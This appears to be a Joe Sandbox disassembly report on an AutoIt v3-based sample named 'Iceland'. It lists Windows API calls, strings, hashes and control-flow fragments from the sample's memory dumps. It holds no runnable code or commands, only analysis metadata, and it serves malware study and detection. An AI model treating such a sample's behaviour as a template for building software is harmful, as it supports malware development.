• Opcode ID: f16fa027d1714ba68280f0cf98733eb1f9b6446aeb554e5bf30f9b2ef0061290
• Instruction ID: 27522621e83a8db0e91cb1a22887724004b7461738b0e0f781ee2b9bf115a576
• Opcode Fuzzy Hash: f16fa027d1714ba68280f0cf98733eb1f9b6446aeb554e5bf30f9b2ef0061290
• Instruction Fuzzy Hash: 2A717F725053119FC704EFA9E9819ABBBF8FF98340F40452EF5418B161EB71DA4ACB91

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00A234DE
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00A234ED
                                                                                                                                                                                                                                                                • LoadIconW.USER32(00000063), ref: 00A23503
                                                                                                                                                                                                                                                                • LoadIconW.USER32(000000A4), ref: 00A23515
                                                                                                                                                                                                                                                                • LoadIconW.USER32(000000A2), ref: 00A23527
                                                                                                                                                                                                                                                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A2353F
                                                                                                                                                                                                                                                                • RegisterClassExW.USER32(?), ref: 00A23590
                                                                                                                                                                                                                                                                  • Part of subcall function 00A23624: GetSysColorBrush.USER32(0000000F), ref: 00A23657
                                                                                                                                                                                                                                                                  • Part of subcall function 00A23624: RegisterClassExW.USER32(00000030), ref: 00A23681
                                                                                                                                                                                                                                                                  • Part of subcall function 00A23624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A23692
                                                                                                                                                                                                                                                                  • Part of subcall function 00A23624: InitCommonControlsEx.COMCTL32(?), ref: 00A236AF
                                                                                                                                                                                                                                                                  • Part of subcall function 00A23624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A236BF
                                                                                                                                                                                                                                                                  • Part of subcall function 00A23624: LoadIconW.USER32(000000A9), ref: 00A236D5
                                                                                                                                                                                                                                                                  • Part of subcall function 00A23624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A236E4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                                                • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                                                • Opcode ID: e686b679d4864215787f34f4c2b97584f442f308c7006ead24d8460bc98416fd
                                                                                                                                                                                                                                                                • Instruction ID: d375de730964e7b8d85bf6e62d4de4158f02a67f9d55046151686538f0b364bb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e686b679d4864215787f34f4c2b97584f442f308c7006ead24d8460bc98416fd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 422133B5D00315ABDB10DFD5EC59BA9BFB4FB08750F00422AF604AB261D7B94546CF90

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • WSAStartup.WS2_32(00000101,?), ref: 00AA1019
                                                                                                                                                                                                                                                                • inet_addr.WSOCK32(?), ref: 00AA1079
                                                                                                                                                                                                                                                                • gethostbyname.WS2_32(?), ref: 00AA1085
                                                                                                                                                                                                                                                                • IcmpCreateFile.IPHLPAPI ref: 00AA1093
                                                                                                                                                                                                                                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00AA1123
                                                                                                                                                                                                                                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00AA1142
                                                                                                                                                                                                                                                                • IcmpCloseHandle.IPHLPAPI(?), ref: 00AA1216
                                                                                                                                                                                                                                                                • WSACleanup.WSOCK32 ref: 00AA121C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                                                • String ID: Ping
                                                                                                                                                                                                                                                                • API String ID: 1028309954-2246546115
                                                                                                                                                                                                                                                                • Opcode ID: 21bb3cb2233101347a1ffdcdce9d4699c19a7fe2feff1ab24e5b5f2d23879f5b
                                                                                                                                                                                                                                                                • Instruction ID: 895937052ad1a1f9bc0a8ae7734024ef38e89da0b89afce668cd2d7035d6fd55
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21bb3cb2233101347a1ffdcdce9d4699c19a7fe2feff1ab24e5b5f2d23879f5b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1391AF31604241AFD720DF59C988F16BBE0EF49318F1486ADF5698B6A2D731ED86CB81

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00A23709,?,?), ref: 00A23777
                                                                                                                                                                                                                                                                • KillTimer.USER32(?,00000001,?,?,?,?,?,00A23709,?,?), ref: 00A237A3
                                                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A237C6
                                                                                                                                                                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00A23709,?,?), ref: 00A237D1
                                                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 00A237E5
                                                                                                                                                                                                                                                                • PostQuitMessage.USER32(00000000), ref: 00A23806
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                                • String ID: TaskbarCreated
                                                                                                                                                                                                                                                                • API String ID: 129472671-2362178303
                                                                                                                                                                                                                                                                • Opcode ID: 8998b20be849a18703f9a0c049d093f984255e99bf32c2f29359e47a4a2f41b6
                                                                                                                                                                                                                                                                • Instruction ID: 2e69e23bcb05dfbb7c7b095555e3daf1f0ee18cc57d0f04761675635e00923c1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8998b20be849a18703f9a0c049d093f984255e99bf32c2f29359e47a4a2f41b6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 604106F3640265BBDF14EBECAD59BB93A76E742300F000235F5028A1A1DABD9B46D761

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: d2f66c1c0e102f552f1314305b6e7efd405ecc455d9ef4f11c30f95d18b6e321
                                                                                                                                                                                                                                                                • Instruction ID: 006c5ad1185313b6bb79b60eb72c30598d3d7956034e050cd8e696e91796e920
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2f66c1c0e102f552f1314305b6e7efd405ecc455d9ef4f11c30f95d18b6e321
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6EC1CE74A04289EFDF11DFE9D841BAEBBB4BF49311F184159E814AF292C7309D4ACB61

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
                                                                                                                                                                                                                                                                • API String ID: 0-4285391669
                                                                                                                                                                                                                                                                • Opcode ID: 4321b94245546c348804793b8797fa5d1e722a65a6e0ebe07cf40cc32583ca8b
                                                                                                                                                                                                                                                                • Instruction ID: a657b3fa46a2c743109ecde60aaeeeb5ed142c5609c6ac0790bba04880ea906a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4321b94245546c348804793b8797fa5d1e722a65a6e0ebe07cf40cc32583ca8b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F624870508341CFC728DF28C598AAABBE1FF88344F10896EE5998B352DB71D945CF92

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                control_flow_graph 1001 a235b3-a23623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A235E1
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A23602
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00A23368,?), ref: 00A23616
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00A23368,?), ref: 00A2361F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                                • Opcode ID: 34b36b47fa3438d2862df00ced324a20ef47d1db4bac771f9f3e618e54911fe9
                                                                                                                                                                                                                                                                • Instruction ID: 0b04a2c7be3655367f21545e19bf3dc72af7e3063279079d4db9b46082abce6a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34b36b47fa3438d2862df00ced324a20ef47d1db4bac771f9f3e618e54911fe9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E4F03AB56002957AE7318B936C0DFB73EBDE7C6F50B00012EB904AB160D6690882DBB0

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00A65287
                                                                                                                                                                                                                                                                  • Part of subcall function 00A28577: _wcslen.LIBCMT ref: 00A2858A
                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A26299
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                                                                                                • String ID: Line %d: $AutoIt - $]]
                                                                                                                                                                                                                                                                • API String ID: 2289894680-740035790
                                                                                                                                                                                                                                                                • Opcode ID: d704a92cdac3f148e878050ddf8cfa3d1b40548a04d223efa1d6b3bedcf5dfc4
                                                                                                                                                                                                                                                                • Instruction ID: 2072e270e48a13082081ce93760b89b42b32c5065ddefed06ab62231445902dc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d704a92cdac3f148e878050ddf8cfa3d1b40548a04d223efa1d6b3bedcf5dfc4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D41A271809324AAC311EBA4ED45FEF7BECAF54310F004A2EF595920A1EB349A49C792

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                control_flow_graph 1053 a2663e-a26654 LoadLibraryA 1054 a26656-a26664 GetProcAddress 1053->1054 1055 a26674-a26678 1053->1055 1056 a26666 1054->1056 1057 a26669-a2666b 1054->1057 1056->1057 1057->1055 1058 a2666d-a2666e FreeLibrary 1057->1058 1058->1055
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A2668B,?,?,00A262FA,?,00000001,?,?,00000000), ref: 00A2664A
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A2665C
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00A2668B,?,?,00A262FA,?,00000001,?,?,00000000), ref: 00A2666E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                • API String ID: 145871493-3689287502

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                control_flow_graph 1059 a258cb-a258d6 1060 a25948-a2594a 1059->1060 1061 a258d8-a258dd 1059->1061 1062 a2593b-a2593e 1060->1062 1061->1060 1063 a258df-a258f7 RegOpenKeyExW 1061->1063 1063->1060 1064 a258f9-a25918 RegQueryValueExW 1063->1064 1065 a2591a-a25925 1064->1065 1066 a2592f-a2593a RegCloseKey 1064->1066 1067 a25927-a25929 1065->1067 1068 a2593f-a25946 1065->1068 1066->1062 1069 a2592d 1067->1069 1068->1069 1069->1066
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00A258BE,SwapMouseButtons,00000004,?), ref: 00A258EF
                                                                                                                                                                                                                                                                • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00A258BE,SwapMouseButtons,00000004,?), ref: 00A25910
                                                                                                                                                                                                                                                                • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00A258BE,SwapMouseButtons,00000004,?), ref: 00A25932
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                                                • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Variable must be of type 'Object'., xrefs: 00A748C6
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: Variable must be of type 'Object'.
                                                                                                                                                                                                                                                                • API String ID: 0-109567571
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 00A315F2
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00A409D8
                                                                                                                                                                                                                                                                  • Part of subcall function 00A43614: RaiseException.KERNEL32(?,?,?,00A409FA,?,00000000,?,?,?,?,?,?,00A409FA,00000000,00AE9758,00000000), ref: 00A43674
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00A409F5
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                • String ID: Unknown exception
                                                                                                                                                                                                                                                                • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                • Opcode ID: 4f7c2acd398aece3618eea7186ce38022bba42e0b1bf66ad415d58ad9b5262d9
                                                                                                                                                                                                                                                                • Instruction ID: 668058d2a29d3acbfcd5fea12ec1e968310cfc2001638611ba86f98128ef07ee
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f7c2acd398aece3618eea7186ce38022bba42e0b1bf66ad415d58ad9b5262d9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59F0AF3C90020DB7CF00BFA8E946D9A776C5E80350B604521BB1496593EB70EA5AA690
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00AA8D52
                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00AA8D59
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?), ref: 00AA8F3A
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 146820519-0
                                                                                                                                                                                                                                                                • Opcode ID: 0ea6762e0482a92a6833cf02ce45afb5fea16e088f49aeb057838f8908da6993
                                                                                                                                                                                                                                                                • Instruction ID: 94dab3915c8702ab9cdb12e24fb2affdf8f581af72b0cbcabd675e91f9f90081
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ea6762e0482a92a6833cf02ce45afb5fea16e088f49aeb057838f8908da6993
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66126A71A083019FC724DF28C584B2ABBE5BF89314F14895DE8898B292DB35ED45CF92
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A232AF
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00A232B7
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A232C2
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A232CD
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00A232D5
